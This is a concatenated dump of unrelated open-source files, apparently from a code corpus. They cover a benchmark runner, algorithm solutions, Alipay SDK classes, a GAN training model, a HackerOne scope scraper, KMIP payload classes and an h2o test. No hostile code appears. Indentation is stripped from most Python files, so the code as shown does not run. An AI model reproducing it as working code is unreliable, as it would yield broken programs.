Tests for the automatic test module.
"""
import unittest
import subprocess
import os
class TestAutomaticTest(unittest.TestCase):
"""
    Tests for the automatic test.
"""
@staticmethod
def test_automatic_test():
"""
        Run the automatic test end to end.
"""
base_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
model_command = ['python3', 'benchmark/tests/test_model/mnist_keras/mnist_keras.py']
subprocess.run(args=model_command, cwd=base_dir, check=True)
command = ['python3', 'benchmark/src/automatic_test.py',
'-d', 'benchmark/tests/docker_test/openvino.Dockerfile',
'-s', 'openvino',
'-b', '.',
'-a', '.',
'-m', 'mnist',
'-c', 'benchmark/tests/client_script/client_script.sh',
'-ss', 'benchmark/tests/serving_script/openvino_serving_script.sh',
'-l', os.path.join(base_dir, 'benchmark/log'),
'-tm', 'benchmark/tests/test_model/mnist_keras',
'-cis', 'mnist_client.py',
'-i', 'mnist.png',
'-cs', 'benchmark/tests/compile_script/openvino_compile_script.sh']
with subprocess.Popen(args=command, cwd=base_dir) as process:
print(process.stdout)
|
Search/hash_tables.py | anand722000/algo_ds_101 | 175 | 12729799 | #!/bin/python3
import math
import os
import random
import re
import sys
def flavors(m,a):
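    # Single-pass hash-table approach: remember the index of each price seen so far
    # and, for every new price, check whether its complement (m - price) was already seen.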
prices = {}
for idx, p in enumerate(a):
if m-p in prices:
return prices[m-p], idx
prices[p] = idx
return None
t = int(input().strip())
for a0 in range(t):
m = int(input().strip())
n = int(input().strip())
a = list(map(int, input().strip().split(' ')))
f1, f2 = flavors(m,a)
print(f1+1, f2+1)
|
test/integration/samples_in/simple_format.py | Inveracity/flynt | 487 | 12729843 | var = 5
a = "my string {:.2f}".format(var) |
alipay/aop/api/response/AlipayOpenMiniAmpeMobileappBatchqueryResponse.py | antopen/alipay-sdk-python-all | 213 | 12729845 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.MobileAppInfo import MobileAppInfo
class AlipayOpenMiniAmpeMobileappBatchqueryResponse(AlipayResponse):
def __init__(self):
super(AlipayOpenMiniAmpeMobileappBatchqueryResponse, self).__init__()
self._mobile_app_info_list = None
@property
def mobile_app_info_list(self):
return self._mobile_app_info_list
@mobile_app_info_list.setter
def mobile_app_info_list(self, value):
if isinstance(value, list):
self._mobile_app_info_list = list()
for i in value:
if isinstance(i, MobileAppInfo):
self._mobile_app_info_list.append(i)
else:
self._mobile_app_info_list.append(MobileAppInfo.from_alipay_dict(i))
def parse_response_content(self, response_content):
response = super(AlipayOpenMiniAmpeMobileappBatchqueryResponse, self).parse_response_content(response_content)
if 'mobile_app_info_list' in response:
self.mobile_app_info_list = response['mobile_app_info_list']
|
problems/tests/test_two_sum_ii_input_array_is_sorted.py | vinta/fuck-coding-interviews | 590 | 12729856 | # coding: utf-8
import unittest
from problems.two_sum_ii_input_array_is_sorted import Solution
class TestCase(unittest.TestCase):
def setUp(self):
self.solution = Solution()
def test(self):
test_data = [
{'numbers': [2, 7, 11, 15], 'target': 9, 'expected': [1, 2]},
{'numbers': [2, 3, 4], 'target': 6, 'expected': [1, 3]},
{'numbers': [-1, 0], 'target': -1, 'expected': [1, 2]},
{'numbers': [1, 2, 3, 4, 5, 6, 7, 19, 100, 222, 412], 'target': 13, 'expected': [6, 7]},
]
for data in test_data:
numbers = data['numbers']
target = data['target']
expected = data['expected']
with self.subTest(numbers=numbers, target=target):
self.assertEqual(self.solution.twoSum(numbers, target), expected)
if __name__ == '__main__':
unittest.main()
|
models/munit_model.py | NguyenHoangAn0511/gan-compression | 1,005 | 12729881 | <reponame>NguyenHoangAn0511/gan-compression
import argparse
import itertools
import ntpath
import os
import numpy as np
import torch
from torch import nn
from tqdm import tqdm
from data import create_eval_dataloader
from metric import create_metric_models, get_fid
from models import networks
from models.base_model import BaseModel
from models.modules.loss import GANLoss
from utils import util
class MunitModel(BaseModel):
@staticmethod
def modify_commandline_options(parser, is_train=False):
assert is_train
parser = super(MunitModel, MunitModel).modify_commandline_options(parser, is_train)
assert isinstance(parser, argparse.ArgumentParser)
parser.add_argument('--restore_G_A_path', type=str, default=None, help='the path to restore the generator A')
parser.add_argument('--restore_G_B_path', type=str, default=None, help='the path to restore the generator B')
parser.add_argument('--restore_D_A_path', type=str, default=None,
help='the path to restore the discriminator A')
parser.add_argument('--restore_D_B_path', type=str, default=None,
help='the path to restore the discriminator B')
parser.add_argument('--style_dim', type=int, default=8,
help='the dimension of the style vector')
parser.add_argument('--n_downsample', type=int, default=2,
help='the number of downsample layer in the generator')
parser.add_argument('--n_res', type=int, default=4,
help='the number of the ResBlock in the generator')
parser.add_argument('--activ', type=str, default='relu',
help='the activation type of the generator')
parser.add_argument('--pad_type', type=str, default='reflect',
help='the padding type of the generator')
parser.add_argument('--mlp_dim', type=int, default=256,
help='the dimension of the mlp layer in the generator')
parser.add_argument('--no_style_encoder', action='store_true',
help='whether to have the style encoder in the generator')
parser.add_argument('--lambda_rec_x', type=float, default=10,
help='weight of image reconstruction loss')
parser.add_argument('--lambda_rec_s', type=float, default=1,
help='weight of style reconstruction loss')
parser.add_argument('--lambda_rec_c', type=float, default=1,
help='weight of content reconstruction loss')
parser.add_argument('--lambda_gan', type=float, default=1,
help='weight of gan loss')
parser.add_argument('--weight_decay', type=float, default=1e-4,
help='weight decay of the optimizer')
parser.add_argument('--real_stat_A_path', type=str, required=True,
help='the path to load the ground-truth A images information to compute FID.')
parser.add_argument('--real_stat_B_path', type=str, required=True,
help='the path to load the ground-truth B images information to compute FID.')
parser.set_defaults(dataset_mode='unaligned', gan_mode='lsgan', load_size=256,
netG='munit', netD='ms_image', ndf=64, n_layers_D=4, init_type='kaiming',
lr_policy='step', lr=1e-4, scheduler_counter='iter',
nepochs=21, nepochs_decay=0, niters=1000000,
save_latest_freq=100000000, save_epoch_freq=1)
return parser
def __init__(self, opt):
assert opt.isTrain
assert opt.direction == 'AtoB'
assert opt.dataset_mode == 'unaligned'
valid_netGs = ['munit', 'mobile_munit']
assert opt.netG in valid_netGs
super(MunitModel, self).__init__(opt)
self.loss_names = ['D_A', 'G_rec_xA', 'G_rec_sA', 'G_rec_cA', 'G_gan_A',
'D_B', 'G_rec_xB', 'G_rec_sB', 'G_rec_cB', 'G_gan_B']
self.visual_names = ['real_A', 'fake_A', 'real_A', 'fake_B']
self.model_names = ['G_A', 'G_B', 'D_A', 'D_B']
self.netG_A = networks.define_G(opt.netG, init_type=opt.init_type,
init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt)
self.netG_B = networks.define_G(opt.netG, init_type=opt.init_type,
init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt)
self.netD_A = networks.define_D(opt.netD, input_nc=opt.input_nc, init_type='normal',
init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt)
self.netD_B = networks.define_D(opt.netD, input_nc=opt.output_nc, init_type='normal',
init_gain=opt.init_gain, gpu_ids=self.gpu_ids, opt=opt)
self.criterionGAN = GANLoss(opt.gan_mode).to(self.device)
self.criterionRec = nn.L1Loss()
self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()),
lr=opt.lr, betas=(opt.beta1, 0.999), weight_decay=opt.weight_decay)
self.optimizer_D = torch.optim.Adam(itertools.chain(self.netD_A.parameters(), self.netD_B.parameters()),
lr=opt.lr, betas=(opt.beta1, 0.999), weight_decay=opt.weight_decay)
self.optimizers = [self.optimizer_G, self.optimizer_D]
self.eval_dataloader_AtoB = create_eval_dataloader(self.opt, direction='AtoB')
self.eval_dataloader_BtoA = create_eval_dataloader(self.opt, direction='BtoA')
self.inception_model, _, _ = create_metric_models(opt, self.device)
self.best_fid_A, self.best_fid_B = 1e9, 1e9
self.fids_A, self.fids_B = [], []
self.is_best = False
self.npz_A = np.load(opt.real_stat_A_path)
self.npz_B = np.load(opt.real_stat_B_path)
def set_input(self, input):
self.real_A = input['A'].to(self.device)
self.real_B = input['B'].to(self.device)
def set_single_input(self, input):
self.real_A = input['A'].to(self.device)
self.image_paths = input['A_paths']
def test_single_side(self, direction):
G_A = getattr(self, 'netG_%s' % direction[0])
G_B = getattr(self, 'netG_%s' % direction[-1])
opt = self.opt
batch_size = self.real_A.size(0)
style_dim = opt.style_dim
with torch.no_grad():
s = torch.randn(batch_size, style_dim, 1, 1, device=self.device)
c, _ = G_A.encode(self.real_A, need_style=False)
self.fake_B = G_B.decode(c, s)
def forward(self, config=None):
raise NotImplementedError
def backward_G(self):
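        # MUNIT-style generator objective: within-domain image reconstruction,
        # style/content reconstruction after re-encoding the cross-domain translations,
        # and adversarial losses against both discriminators.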
opt = self.opt
batch_size = self.real_A.size(0)
style_dim = opt.style_dim
s_a = torch.randn(batch_size, style_dim, 1, 1, device=self.device)
s_b = torch.randn(batch_size, style_dim, 1, 1, device=self.device)
# encode
c_a, s_a_prime = self.netG_A.encode(self.real_A)
c_b, s_b_prime = self.netG_B.encode(self.real_B)
# decode (within domain)
rec_A = self.netG_A.decode(c_a, s_a_prime)
rec_B = self.netG_B.decode(c_b, s_b_prime)
# decode (cross domain)
fake_A = self.netG_A.decode(c_b, s_a)
fake_B = self.netG_B.decode(c_a, s_b)
# encode again
c_b_recon, s_a_recon = self.netG_A.encode(fake_A)
c_a_recon, s_b_recon = self.netG_B.encode(fake_B)
# reconstruction loss
self.loss_G_rec_xA = opt.lambda_rec_x * self.criterionRec(rec_A, self.real_A)
self.loss_G_rec_xB = opt.lambda_rec_x * self.criterionRec(rec_B, self.real_B)
self.loss_G_rec_sA = opt.lambda_rec_s * self.criterionRec(s_a_recon, s_a)
self.loss_G_rec_sB = opt.lambda_rec_s * self.criterionRec(s_b_recon, s_b)
self.loss_G_rec_cA = opt.lambda_rec_c * self.criterionRec(c_a_recon, c_a)
self.loss_G_rec_cB = opt.lambda_rec_c * self.criterionRec(c_b_recon, c_b)
# gan loss
self.loss_G_gan_A = opt.lambda_gan * self.criterionGAN(self.netD_A(fake_A), True, for_discriminator=False)
self.loss_G_gan_B = opt.lambda_gan * self.criterionGAN(self.netD_B(fake_B), True, for_discriminator=False)
self.loss_G = self.loss_G_rec_xA + self.loss_G_rec_xB + \
self.loss_G_rec_sA + self.loss_G_rec_sB + \
self.loss_G_rec_cA + self.loss_G_rec_cB + \
self.loss_G_gan_A + self.loss_G_gan_B
self.loss_G.backward()
def backward_D(self):
opt = self.opt
batch_size = self.real_A.size(0)
style_dim = opt.style_dim
s_a = torch.randn(batch_size, style_dim, 1, 1, device=self.device)
s_b = torch.randn(batch_size, style_dim, 1, 1, device=self.device)
# encode
c_a, _ = self.netG_A.encode(self.real_A, need_style=False)
c_b, _ = self.netG_B.encode(self.real_B, need_style=False)
# decode (cross domain)
fake_A = self.netG_A.decode(c_b, s_a)
fake_B = self.netG_B.decode(c_a, s_b)
# gan loss
self.loss_D_A = opt.lambda_gan * (self.criterionGAN(self.netD_A(fake_A.detach()), False) +
self.criterionGAN(self.netD_A(self.real_A), True))
self.loss_D_B = opt.lambda_gan * (self.criterionGAN(self.netD_B(fake_B.detach()), False) +
self.criterionGAN(self.netD_B(self.real_B), True))
self.loss_D = self.loss_D_A + self.loss_D_B
self.loss_D.backward()
def optimize_parameters(self, steps):
self.set_requires_grad([self.netD_A, self.netD_B], False) # Ds require no gradients when optimizing Gs
self.optimizer_G.zero_grad()
self.backward_G()
self.optimizer_G.step()
        self.set_requires_grad([self.netD_A, self.netD_B], True)  # Ds require gradients when optimizing Ds
self.optimizer_D.zero_grad() # set D_A and D_B's gradients to zero
self.backward_D() # calculate gradients for D_A and D_B
self.optimizer_D.step() # update D_A and D_B's weights
def profile(self, config=None, verbose=True):
raise NotImplementedError
def test(self, config=None):
with torch.no_grad():
self.forward(config)
def evaluate_model(self, step):
ret = {}
self.is_best = False
save_dir = os.path.join(self.opt.log_dir, 'eval', str(step))
os.makedirs(save_dir, exist_ok=True)
self.netG_A.eval()
self.netG_B.eval()
for direction in ['AtoB', 'BtoA']:
eval_dataloader = getattr(self, 'eval_dataloader_' + direction)
fakes, names = [], []
cnt = 0
for i, data_i in enumerate(tqdm(eval_dataloader, desc='Eval %s ' % direction, position=2, leave=False)):
self.set_single_input(data_i)
self.test_single_side(direction)
fakes.append(self.fake_B.cpu())
for j in range(len(self.image_paths)):
short_path = ntpath.basename(self.image_paths[j])
name = os.path.splitext(short_path)[0]
names.append(name)
if cnt < 10:
input_im = util.tensor2im(self.real_A[j])
fake_im = util.tensor2im(self.fake_B[j])
util.save_image(input_im, os.path.join(save_dir, direction, 'input', '%s.png' % name),
create_dir=True)
util.save_image(fake_im, os.path.join(save_dir, direction, 'fake', '%s.png' % name),
create_dir=True)
cnt += 1
suffix = direction[-1]
fid = get_fid(fakes, self.inception_model, getattr(self, 'npz_%s' % direction[-1]),
device=self.device, batch_size=self.opt.eval_batch_size, tqdm_position=2)
if fid < getattr(self, 'best_fid_%s' % suffix):
self.is_best = True
setattr(self, 'best_fid_%s' % suffix, fid)
fids = getattr(self, 'fids_%s' % suffix)
fids.append(fid)
if len(fids) > 3:
fids.pop(0)
ret['metric/fid_%s' % suffix] = fid
ret['metric/fid_%s-mean' % suffix] = sum(getattr(self, 'fids_%s' % suffix)) / len(
getattr(self, 'fids_%s' % suffix))
ret['metric/fid_%s-best' % suffix] = getattr(self, 'best_fid_%s' % suffix)
self.netG_A.train()
self.netG_B.train()
return ret
|
scripts/remove-multilabel-pairs.py | brmson/dataset-factoid-webquestions | 161 | 12729883 | <gh_stars>100-1000
#!/usr/bin/env python3
import csv, sys
file_name = sys.argv[1]
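# First pass: count positive labels per (question, answer) pair; second pass: keep all
# positive rows and drop negative rows whose pair also occurs with a positive label.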
pos = {}
with open(file_name) as f:
r = csv.reader(f, delimiter=',')
for s in r:
if (s[0] == 'qtext'):
continue
key = s[0] + ',' + s[2]
if (s[1] == '1'):
if (key in pos):
pos[key] += 1
else:
pos[key] = 1
outcsv = csv.DictWriter(sys.stdout, fieldnames=['qtext', 'label', 'atext'])
outcsv.writeheader()
with open(file_name) as f:
r = csv.reader(f, delimiter=',')
for s in r:
if (s[0] == 'qtext'):
continue
key = s[0] + ',' + s[2]
if (key not in pos or s[1] == '1'):
outcsv.writerow({'qtext':s[0], 'label':s[1], 'atext':s[2]}) |
alipay/aop/api/response/ZhimaCreditContractBorrowQueryResponse.py | antopen/alipay-sdk-python-all | 213 | 12729904 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class ZhimaCreditContractBorrowQueryResponse(AlipayResponse):
def __init__(self):
super(ZhimaCreditContractBorrowQueryResponse, self).__init__()
self._status = None
self._subjects_borrowed = None
self._subjects_returned = None
@property
def status(self):
return self._status
@status.setter
def status(self, value):
self._status = value
@property
def subjects_borrowed(self):
return self._subjects_borrowed
@subjects_borrowed.setter
def subjects_borrowed(self, value):
self._subjects_borrowed = value
@property
def subjects_returned(self):
return self._subjects_returned
@subjects_returned.setter
def subjects_returned(self, value):
self._subjects_returned = value
def parse_response_content(self, response_content):
response = super(ZhimaCreditContractBorrowQueryResponse, self).parse_response_content(response_content)
if 'status' in response:
self.status = response['status']
if 'subjects_borrowed' in response:
self.subjects_borrowed = response['subjects_borrowed']
if 'subjects_returned' in response:
self.subjects_returned = response['subjects_returned']
|
web/vultargetspider/management/commands/HackeroneSpider.py | laozhudetui/LSpider | 311 | 12729917 | <reponame>laozhudetui/LSpider<filename>web/vultargetspider/management/commands/HackeroneSpider.py
#!/usr/bin/env python
# encoding: utf-8
'''
@author: LoRexxar
@contact: <EMAIL>
@file: HackeroneSpider.py
@time: 2020/4/22 15:05
@desc:
'''
from django.core.management.base import BaseCommand
from web.vultargetspider.controller.hackerone import HackeroneSpider
from utils.log import logger
import sys
import traceback
class Command(BaseCommand):
help = 'spider for hackerone'
def add_arguments(self, parser):
# Positional arguments
parser.add_argument('appname', type=str)
def handle(self, *args, **options):
try:
if 'appname' not in options:
logger.error('[Hackerone Spider] no appname input.')
sys.exit(0)
logger.info("[Hackerone Spider] Hackerone {} Scope spider start.".format(options['appname']))
h = HackeroneSpider()
result_list = h.spider(options['appname'])
for result in result_list:
print(result)
except KeyboardInterrupt:
logger.warn("[Spider] stop monitor.")
sys.exit(0)
except:
logger.error("[Spider] something error, {}".format(traceback.format_exc()))
|
kmip/core/messages/payloads/delete_attribute.py | ondrap/PyKMIP | 179 | 12729938 | # Copyright (c) 2019 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
from kmip.core import enums
from kmip.core import exceptions
from kmip.core import objects
from kmip.core import primitives
from kmip.core import utils
from kmip.core.messages.payloads import base
class DeleteAttributeRequestPayload(base.RequestPayload):
"""
A request payload for the DeleteAttribute operation.
Attributes:
unique_identifier: The unique ID of the object on which attribute
deletion should be performed.
attribute_name: The name of the attribute to be deleted. Used in
KMIP 1.0 - 1.4.
attribute_index: The index of the attribute to be deleted. Used in
KMIP 1.0 - 1.4.
current_attribute: The attribute to be deleted. Used in KMIP 2.0+.
attribute_reference: The reference to the attribute to be deleted.
Used in KMIP 2.0+.
"""
def __init__(self,
unique_identifier=None,
attribute_name=None,
attribute_index=None,
current_attribute=None,
attribute_reference=None):
"""
Construct a DeleteAttribute request payload.
Args:
unique_identifier (string): The unique ID of the object on which
attribute deletion should be performed. Optional, defaults to
None.
attribute_name (string): The name of the attribute to be deleted.
Used in KMIP 1.0 - 1.4. Defaults to None. Required for
read/write.
attribute_index (int): The index of the attribute to be deleted.
Used in KMIP 1.0 - 1.4. Optional, defaults to None.
current_attribute (struct): A CurrentAttribute structure containing
the attribute to be deleted. Used in KMIP 2.0+. Optional,
defaults to None. Must be specified if the attribute reference
is not provided.
attribute_reference (struct): An AttributeReference structure
containing a reference to the attribute to be deleted. Used in
KMIP 2.0+. Optional, defaults to None. Must be specified if the
current attribute is not specified.
"""
super(DeleteAttributeRequestPayload, self).__init__()
self._unique_identifier = None
self._attribute_name = None
self._attribute_index = None
self._current_attribute = None
self._attribute_reference = None
self.unique_identifier = unique_identifier
self.attribute_name = attribute_name
self.attribute_index = attribute_index
self.current_attribute = current_attribute
self.attribute_reference = attribute_reference
@property
def unique_identifier(self):
if self._unique_identifier:
return self._unique_identifier.value
return None
@unique_identifier.setter
def unique_identifier(self, value):
if value is None:
self._unique_identifier = None
elif isinstance(value, six.string_types):
self._unique_identifier = primitives.TextString(
value=value,
tag=enums.Tags.UNIQUE_IDENTIFIER
)
else:
raise TypeError("The unique identifier must be a string.")
@property
def attribute_name(self):
if self._attribute_name:
return self._attribute_name.value
return None
@attribute_name.setter
def attribute_name(self, value):
if value is None:
self._attribute_name = None
elif isinstance(value, six.string_types):
self._attribute_name = primitives.TextString(
value=value,
tag=enums.Tags.ATTRIBUTE_NAME
)
else:
raise TypeError("The attribute name must be a string.")
@property
def attribute_index(self):
if self._attribute_index:
return self._attribute_index.value
return None
@attribute_index.setter
def attribute_index(self, value):
if value is None:
self._attribute_index = None
elif isinstance(value, six.integer_types):
self._attribute_index = primitives.Integer(
value=value,
tag=enums.Tags.ATTRIBUTE_INDEX
)
else:
raise TypeError("The attribute index must be an integer.")
@property
def current_attribute(self):
if self._current_attribute:
return self._current_attribute
return None
@current_attribute.setter
def current_attribute(self, value):
if value is None:
self._current_attribute = None
elif isinstance(value, objects.CurrentAttribute):
self._current_attribute = value
else:
raise TypeError(
"The current attribute must be a CurrentAttribute object."
)
@property
def attribute_reference(self):
if self._attribute_reference:
return self._attribute_reference
return None
@attribute_reference.setter
def attribute_reference(self, value):
if value is None:
self._attribute_reference = None
elif isinstance(value, objects.AttributeReference):
self._attribute_reference = value
else:
raise TypeError(
"The attribute reference must be an AttributeReference object."
)
def read(self, input_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Read the data encoding the DeleteAttribute request payload and decode
it into its constituent part.
Args:
input_buffer (stream): A data stream containing encoded object
data, supporting a read method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be decoded. Optional,
defaults to KMIP 1.0.
Raises:
InvalidKmipEncoding: Raised if fields are missing from the
encoding.
"""
super(DeleteAttributeRequestPayload, self).read(
input_buffer,
kmip_version=kmip_version
)
local_buffer = utils.BytearrayStream(input_buffer.read(self.length))
if self.is_tag_next(enums.Tags.UNIQUE_IDENTIFIER, local_buffer):
self._unique_identifier = primitives.TextString(
tag=enums.Tags.UNIQUE_IDENTIFIER
)
self._unique_identifier.read(
local_buffer,
kmip_version=kmip_version
)
else:
self._unique_identifier = None
if kmip_version < enums.KMIPVersion.KMIP_2_0:
if self.is_tag_next(enums.Tags.ATTRIBUTE_NAME, local_buffer):
self._attribute_name = primitives.TextString(
tag=enums.Tags.ATTRIBUTE_NAME
)
self._attribute_name.read(
local_buffer,
kmip_version=kmip_version
)
else:
raise exceptions.InvalidKmipEncoding(
"The DeleteAttribute request payload encoding is missing "
"the attribute name field."
)
if self.is_tag_next(enums.Tags.ATTRIBUTE_INDEX, local_buffer):
self._attribute_index = primitives.Integer(
tag=enums.Tags.ATTRIBUTE_INDEX
)
self._attribute_index.read(
local_buffer,
kmip_version=kmip_version
)
else:
self._attribute_index = None
else:
if self.is_tag_next(enums.Tags.CURRENT_ATTRIBUTE, local_buffer):
self._current_attribute = objects.CurrentAttribute()
self._current_attribute.read(
local_buffer,
kmip_version=kmip_version
)
else:
self._current_attribute = None
if self.is_tag_next(enums.Tags.ATTRIBUTE_REFERENCE, local_buffer):
self._attribute_reference = objects.AttributeReference()
self._attribute_reference.read(
local_buffer,
kmip_version=kmip_version
)
else:
self._attribute_reference = None
if self._current_attribute == self._attribute_reference:
raise exceptions.InvalidKmipEncoding(
"The DeleteAttribute encoding is missing either the "
"current attribute or the attribute reference field."
)
self.is_oversized(local_buffer)
def write(self, output_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Write the data encoding the DeleteAttribute request payload to a
stream.
Args:
output_buffer (stream): A data stream in which to encode object
data, supporting a write method; usually a BytearrayStream
object.
kmip_version (KMIPVersion): An enumeration defining the KMIP
version with which the object will be encoded. Optional,
defaults to KMIP 1.0.
Raises:
InvalidField
"""
local_buffer = utils.BytearrayStream()
if self._unique_identifier:
self._unique_identifier.write(
local_buffer,
kmip_version=kmip_version
)
if kmip_version < enums.KMIPVersion.KMIP_2_0:
if self._attribute_name:
self._attribute_name.write(
local_buffer,
kmip_version=kmip_version
)
else:
raise exceptions.InvalidField(
"The DeleteAttribute request payload is missing the "
"attribute name field."
)
if self._attribute_index:
self._attribute_index.write(
local_buffer,
kmip_version=kmip_version
)
else:
if self._current_attribute == self._attribute_reference:
raise exceptions.InvalidField(
"The DeleteAttribute request payload is missing either "
"the current attribute or the attribute reference field."
)
if self._current_attribute:
self._current_attribute.write(
local_buffer,
kmip_version=kmip_version
)
if self._attribute_reference:
self._attribute_reference.write(
local_buffer,
kmip_version=kmip_version
)
self.length = local_buffer.length()
super(DeleteAttributeRequestPayload, self).write(
output_buffer,
kmip_version=kmip_version
)
output_buffer.write(local_buffer.buffer)
def __repr__(self):
args = [
"unique_identifier='{}'".format(self.unique_identifier),
"attribute_name='{}'".format(self.attribute_name),
"attribute_index={}".format(self.attribute_index),
"current_attribute={}".format(repr(
self.current_attribute
) if self.current_attribute else None),
"attribute_reference={}".format(repr(
self.attribute_reference
) if self.attribute_reference else None)
]
return "DeleteAttributeRequestPayload({})".format(", ".join(args))
def __str__(self):
return str(
{
"unique_identifier": self.unique_identifier,
"attribute_name": self.attribute_name,
"attribute_index": self.attribute_index,
"current_attribute": str(
self.current_attribute
) if self.current_attribute else None,
"attribute_reference": str(
self.attribute_reference
) if self.attribute_reference else None
}
)
def __eq__(self, other):
if isinstance(other, DeleteAttributeRequestPayload):
if self.unique_identifier != other.unique_identifier:
return False
elif self.attribute_name != other.attribute_name:
return False
elif self.attribute_index != other.attribute_index:
return False
elif self.current_attribute != other.current_attribute:
return False
elif self.attribute_reference != other.attribute_reference:
return False
else:
return True
else:
return NotImplemented
def __ne__(self, other):
if isinstance(other, DeleteAttributeRequestPayload):
return not self.__eq__(other)
else:
return NotImplemented
class DeleteAttributeResponsePayload(base.ResponsePayload):
"""
A response payload for the DeleteAttribute operation.
Attributes:
unique_identifier: The unique ID of the object on which attribute
deletion was performed. Optional, defaults to None.
attribute: The attribute object deleted from the managed object. Used
in KMIP 1.0 - 1.4.
"""
def __init__(self, unique_identifier=None, attribute=None):
"""
Construct a DeleteAttribute response payload.
Args:
unique_identifier (string): The unique ID of the object on
which attribute deletion was performed. Defaults to None.
Required for read/write.
attribute (struct): An Attribute object containing the attribute
that was deleted. Used in KMIP 1.0 - 1.4. Defaults to None.
Required for read/write.
"""
super(DeleteAttributeResponsePayload, self).__init__()
self._unique_identifier = None
self._attribute = None
self.unique_identifier = unique_identifier
self.attribute = attribute
@property
def unique_identifier(self):
if self._unique_identifier:
return self._unique_identifier.value
return None
@unique_identifier.setter
def unique_identifier(self, value):
if value is None:
self._unique_identifier = None
elif isinstance(value, six.string_types):
self._unique_identifier = primitives.TextString(
value=value,
tag=enums.Tags.UNIQUE_IDENTIFIER
)
else:
raise TypeError("The unique identifier must be a string.")
@property
def attribute(self):
if self._attribute:
return self._attribute
return None
@attribute.setter
def attribute(self, value):
if value is None:
self._attribute = None
elif isinstance(value, objects.Attribute):
self._attribute = value
else:
raise TypeError(
"The attribute must be an Attribute object."
)
def read(self, input_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Read the data encoding the DeleteAttribute response payload and decode
it into its constituent parts.
Args:
input_buffer (stream): A data stream containing encoded object
data, supporting a read method; usually a BytearrayStream
object.
kmip_version (enum): A KMIPVersion enumeration defining the KMIP
version with which the object will be decoded. Optional,
defaults to KMIP 1.0.
Raises:
InvalidKmipEncoding: Raised if any required fields are missing
from the encoding.
"""
super(DeleteAttributeResponsePayload, self).read(
input_buffer,
kmip_version=kmip_version
)
local_buffer = utils.BytearrayStream(input_buffer.read(self.length))
if self.is_tag_next(enums.Tags.UNIQUE_IDENTIFIER, local_buffer):
self._unique_identifier = primitives.TextString(
tag=enums.Tags.UNIQUE_IDENTIFIER
)
self._unique_identifier.read(
local_buffer,
kmip_version=kmip_version
)
else:
raise exceptions.InvalidKmipEncoding(
"The DeleteAttribute response payload encoding is missing the "
"unique identifier field."
)
if kmip_version < enums.KMIPVersion.KMIP_2_0:
if self.is_tag_next(enums.Tags.ATTRIBUTE, local_buffer):
self._attribute = objects.Attribute()
self._attribute.read(local_buffer, kmip_version=kmip_version)
else:
raise exceptions.InvalidKmipEncoding(
"The DeleteAttribute response payload encoding is missing "
"the attribute field."
)
self.is_oversized(local_buffer)
def write(self, output_buffer, kmip_version=enums.KMIPVersion.KMIP_1_0):
"""
Write the data encoding the DeleteAttribute response payload to a
buffer.
Args:
output_buffer (buffer): A data buffer in which to encode object
data, supporting a write method; usually a BytearrayStream
object.
kmip_version (enum): A KMIPVersion enumeration defining the KMIP
version with which the object will be encoded. Optional,
defaults to KMIP 1.0.
Raises:
InvalidField: Raised if a required field is missing from the
payload object.
"""
local_buffer = utils.BytearrayStream()
if self._unique_identifier:
self._unique_identifier.write(
local_buffer,
kmip_version=kmip_version
)
else:
raise exceptions.InvalidField(
"The DeleteAttribute response payload is missing the unique "
"identifier field."
)
if kmip_version < enums.KMIPVersion.KMIP_2_0:
if self._attribute:
self._attribute.write(
local_buffer,
kmip_version=kmip_version
)
else:
raise exceptions.InvalidField(
"The DeleteAttribute response payload is missing the "
"attribute field."
)
self.length = local_buffer.length()
super(DeleteAttributeResponsePayload, self).write(
output_buffer,
kmip_version=kmip_version
)
output_buffer.write(local_buffer.buffer)
def __repr__(self):
args = [
"unique_identifier='{}'".format(self.unique_identifier),
"attribute={}".format(repr(self.attribute))
]
return "DeleteAttributeResponsePayload({})".format(", ".join(args))
def __str__(self):
return str(
{
"unique_identifier": self.unique_identifier,
"attribute": str(self.attribute)
}
)
def __eq__(self, other):
if isinstance(other, DeleteAttributeResponsePayload):
if self.unique_identifier != other.unique_identifier:
return False
elif self.attribute != other.attribute:
return False
else:
return True
return NotImplemented
def __ne__(self, other):
if isinstance(other, DeleteAttributeResponsePayload):
return not self.__eq__(other)
return NotImplemented
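# A minimal, illustrative usage sketch (the identifier and attribute values below are
# made up, not taken from a real KMIP server):
#   payload = DeleteAttributeRequestPayload(
#       unique_identifier="b4faee10-aa2a-4446-8ad4-0881f3422959",
#       attribute_name="x-custom-attribute",
#       attribute_index=0
#   )
#   buffer = utils.BytearrayStream()
#   payload.write(buffer, kmip_version=enums.KMIPVersion.KMIP_1_0)
#   # A fresh DeleteAttributeRequestPayload().read(buffer, ...) decodes it back.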
|
h2o-hadoop-common/tests/python/pyunit_gcs_import.py | kernelrich/h2o-3 | 6,098 | 12729987 | #! /usr/env/python
import sys
import os
sys.path.insert(1, os.path.join("../../../h2o-py"))
from tests import pyunit_utils
import h2o
def gcs_import():
    # Just test that the import works - no class clashes, no exceptions
keys = h2o.import_file(
"gs://gcp-public-data-nexrad-l2/2018/01/01/KABR/NWS_NEXRAD_NXL2DPBL_KABR_20180101050000_20180101055959.tar",
parse=False)
assert len(keys) == 1
assert keys == [
'gs://gcp-public-data-nexrad-l2/2018/01/01/KABR/NWS_NEXRAD_NXL2DPBL_KABR_20180101050000_20180101055959.tar']
